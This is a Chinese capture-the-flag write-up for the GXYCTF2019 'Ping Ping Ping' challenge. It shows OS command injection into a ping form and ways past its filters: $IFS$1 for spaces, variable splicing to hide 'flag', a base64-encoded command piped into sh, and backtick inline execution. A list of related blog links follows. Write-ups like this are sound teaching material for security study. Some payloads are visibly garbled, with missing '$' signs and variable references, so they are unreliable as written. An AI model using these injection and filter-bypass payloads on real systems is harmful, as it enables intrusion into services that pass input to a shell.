[GXYCTF2019]Ping Ping Ping1

打开靶机

结合题目名称,考虑是命令注入,试试ls

结果应该就在flag.php。尝试构造命令注入载荷。 cat flag.php

可以看到过滤了空格,用 $IFS$1替换空格

还过滤了flag,我们用字符拼接的方式看能否绕过,a=g;cat$IFS1flaa.php。注意这里用分号间隔,所以不能用管道符连接了。

可以看到flag了。这里有个坑,这段是纯php代码,所以在页面上没有显示出来,要注意观察界面的源码。

其实可以先看一下index.php

基本上可以看到过滤了哪些内容。所以还可以用base64编码绕过过滤

echo$IFS1Y2F0IGZsYWcucGhw\|base64IFS$1-d|sh

既然ls能把flag找出来, 则还可以利用内联的方式获取flag cat$IFS$1`ls`

放一个命令注入的介绍:命令注入以及常见绕过方式_命令注入如何绕过空色-CSDN博客

相关推荐
qmx_0717 分钟前
HTB-Jerry(tomcat war文件、msfvenom)
java·web安全·网络安全·tomcat
衍生星球7 小时前
【网络安全】对称密码体制
网络·安全·网络安全·密码学·对称密码
掘根7 小时前
【网络】高级IO——poll版本TCP服务器
网络·数据库·sql·网络协议·tcp/ip·mysql·网络安全
网安加社区9 小时前
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览
安全·网络安全·政策法规
weixin_4462608511 小时前
24年蓝桥杯及攻防世界赛题-MISC-3
网络安全·蓝桥杯
weixin_4462608512 小时前
24年蓝桥杯及攻防世界赛题-MISC-2
网络安全·蓝桥杯
xuan哈哈哈16 小时前
web基础—dvwa靶场(八)SQL Injection(Blind)
数据库·web安全·网络安全
竹等寒16 小时前
Spring框架常见漏洞
java·spring·网络安全
Dovir多多1 天前
渗透测试入门学习——php表单form与POST、GET请求练习
学习·安全·web安全·网络安全·系统安全·php·xss